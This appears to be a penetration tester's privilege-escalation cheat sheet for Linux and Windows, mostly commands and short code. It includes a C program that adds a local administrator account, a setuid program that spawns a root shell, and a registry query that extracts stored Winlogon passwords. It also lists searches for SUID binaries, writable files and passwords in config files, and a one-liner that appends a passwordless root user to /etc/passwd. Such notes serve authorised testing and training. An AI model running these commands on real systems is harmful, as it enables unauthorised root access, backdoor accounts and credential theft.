Priv Escalation
Privilege Escalation
https://payatu.com/guide-linux-privilege-escalation
Linux Privilege Escalation
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
Windows Privilege Escalation
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys
Kernel Exploits
Linux: https://github.com/lucyoa/kernel-exploits
Windows: https://github.com/abatchy17/WindowsExploits
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html
Windows Add User
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
return 0;
}
SUID Change
SUID
Set owner user ID.
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null
#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null
#Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null
find / -perm -4000 2>/dev/null
writable by everyone
find / -writable -type f 2>/dev/null
World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Writeable config files
find /etc/ -writable -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Window Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevated
Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
Default writeable directory / folder
/tmp
/dev/shm
Search for passwords
Search for password within config.php
grep -R 'password' config.php
Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
Service(s) running as root user
ps aux | grep root
ps -ef | grep root
Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/
Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'
Sticky bit, SGID, SUID, GUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
Last updated
Was this helpful?